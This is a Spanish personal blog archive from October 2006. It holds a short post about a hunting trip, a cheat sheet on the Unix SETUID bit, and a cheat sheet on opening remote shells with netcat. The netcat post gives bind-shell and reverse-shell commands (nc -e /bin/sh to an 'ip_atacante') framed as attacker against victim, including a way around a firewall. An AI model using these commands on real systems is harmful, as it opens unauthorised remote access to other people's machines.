Archive for Octubre, 2006
Mi primera Montería
Hola gente, este fin de semana he estado en mi primera montería seria*. De hecho mi tio Balo me invitó a 2 monterías con el Grupo Miranda en Jaén.
Bit SETUID
He encontrado otra chuletilla para explicar con un pequeño ejemplo para que sirve y como funciona el bit de SETUID.
Échale un ojo a los permisos de los siguientes ficheros :
-rw-r—– 1 root shadow 1575 Sep 20 13:15 /etc/shadow
-rwsr-xr-x 1 root root 26616 May 18 2005 /usr/bin/passwd
Como veis, en el fichero shadow solo tiene permisos de escritura el usuario root. Por lo que en un principio, un usuario cualquiera, no podría modificar ese fichero al cambiar su password.
Gracias a que el comando passwd tiene activado el bit ’s’, un usuario corriente del sistema puede modificar su password. Esto se debe a que al ejecutarse el comando, el usuario se convierte en root (dueño del comando) que si que tiene permiso de modificación del fichero shadow.
Como se activaría el bit ’s’?
chmod 4511 /usr/bin/passwd
Hemos sumado 4000 a los permisos del fichero para activar la “transferencia de identidad”.
Como se desactivaría el bit ’s’?
No commentschmod 511 /usr/bin/passwd
Shell con Netcat
Estaba revisando mis borradores, y vi una chuletilla con los comandos necesarios para obtener una shell remota con netcat:
En el equipo remoto (o víctima ;-) ) ejecutaríamos:
nc -e /bin/sh -l -p 9999
En nuestro equipo (o el del atacante ;-) ) ejecutaríamos:
nc ip_victima 9999
Si la victima tuviese un firewall y bloquease ese puerto, lo anterior no funcionaría, y deberíamos intentar que la víctima se conectase a nuestra máquina de la siguiente manera:
En el atacante:
nc -v -n -l -p 9999
En la víctima:
nc -e /bin/sh ip_atacante 9999
Evidentemente, se trata de ejecutar una shell de un sistema tipo Unix. Además, el puerto 9999 utilizado se puede modificar por el que más convenga.
No comments
